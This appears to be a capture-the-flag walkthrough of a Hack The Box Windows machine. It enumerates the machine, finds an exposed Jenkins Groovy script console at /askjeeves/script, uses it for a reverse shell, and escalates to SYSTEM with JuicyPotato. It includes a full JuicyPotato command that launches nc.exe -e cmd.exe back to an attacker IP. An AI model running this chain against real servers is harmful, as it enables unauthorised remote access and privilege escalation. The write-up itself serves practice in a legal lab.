Last updated
Was this helpful?
Last updated
Was this helpful?
nmapAutomator.sh -H 10.10.10.63 -t all
A HTTP service runs on port 80. Entering an input in the search bar results in a server error, showing us some information about the versions of the services and OS it is running.
Another web service, running Jetty, is on port 50000. Using the directory-list-2.3-medium.txt wordlist from dirbuster, we can perform subdirectory enumeration on the target.
gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
This uncovers a /askjeeves directory.
By going to http://10.10.10.63:50000/askjeeves/, we find a Jenkins page.
By going to http://10.10.10.63:50000/askjeeves/script, we can execute scripts on the Groovy script console.
By changing first line in the script, we can execute arbitrary shell commands.
We can change the script to instead trigger a reverse shell.
On our Netcat listener, we obtain a reverse shell.
We can use WinPEAS to enumerate.
After transferring JuicyPotato.exe and Netcat, we can run the following command to get another shell:
JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\nc.exe -e cmd.exe 10.10.14.23 443" -t *
We have successfully obtained SYSTEM privileges.
We find a hm.txt in place of root.txt.
However, we can find that there is an additional data stream hidden in the file.
Source:
Very quickly, we see that the SeImpersonatePrivilege token is enabled. We can exploit this with JuicyPotato ().
